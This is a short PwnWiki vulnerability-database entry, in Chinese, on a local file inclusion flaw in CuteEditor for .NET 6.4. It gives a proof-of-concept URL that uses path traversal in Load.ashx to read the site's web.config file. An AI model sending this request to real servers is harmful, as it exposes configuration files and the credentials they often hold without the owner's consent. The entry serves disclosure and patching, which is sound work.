Loading
0

Cute editor本地文件包含漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

影响版本

CuteEditor For Net 6.4

POC

http://navisec.it/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

PWNWIK.COM